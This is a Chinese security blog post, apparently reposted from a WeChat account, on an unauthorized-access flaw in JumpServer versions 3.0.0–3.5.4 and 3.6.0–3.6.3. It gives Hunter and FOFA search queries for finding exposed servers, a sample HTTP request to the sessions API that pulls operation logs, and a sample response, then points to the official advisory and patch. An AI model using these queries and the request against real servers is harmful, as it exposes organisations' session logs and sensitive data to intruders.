JumpServer未授权访问漏洞

admin 2024年2月18日23:11:49评论53 views字数 1517阅读5分3秒阅读模式
JumpServer未授权访问漏洞
免责声明

月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!

2023热乎漏洞--JumpServer未授权访问漏洞

JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志,可导致敏感信息泄漏

2023热乎漏洞--JumpServer未授权访问漏洞

JumpServer是一款开源的堡垒机和权限管理系统,旨在帮助企业实现对服务器和网络设备的安全管理和访问控制。JumpServer的权限管理存在缺陷,未经授权的远程攻击者可以下载历史会话连接期间的所有操作日志。经过分析和研判,该漏洞利用难度低,可导致敏感信息泄漏。

影响版本

  3.0.0 <= version <= 3.5.4  3.6.0 <= version <= 3.6.3

2023热乎漏洞--JumpServer未授权访问漏洞

hunter语法:app.name="JumpServer"FOFA:app="JumpServer-堡垒机"

JumpServer未授权访问漏洞
请求包

GET /api/v1/terminal/sessions/ HTTP/1.1Host: XX.XX.XX.XXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ak;q=0.8Cookie: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18Connection: close

响应包

HTTP/1.1 200 OKServer: nginxDate: Wed, 20 Sep 2023 02:09:54 GMTContent-Type: application/jsonContent-Length: 759031Connection: closeVary: Accept, Accept-Language, CookieAllow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONSX-Frame-Options: DENYContent-Language: zh-hansX-Content-Type-Options: nosniffReferrer-Policy: same-originSet-Cookie: jms_sessionid=tl4l16mf5x23mg0g2ku5npf2q2apru18; HttpOnly; Path=/; SameSite=Lax[{"id":"xxxx","user":"xxx",.....}]

修复建议

官方已发布修复方案,受影响的用户建议联系官方获取安全补丁。

https://github.com/jumpserver/jumpserver/security/advisories/GHSA-633x-3f4f-v9rw

原文始发于微信公众号(月落安全):2023热乎漏洞--JumpServer未授权访问漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月18日23:11:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JumpServer未授权访问漏洞http://cn-sec.com/archives/2133156.html

发表评论

匿名网友 填写信息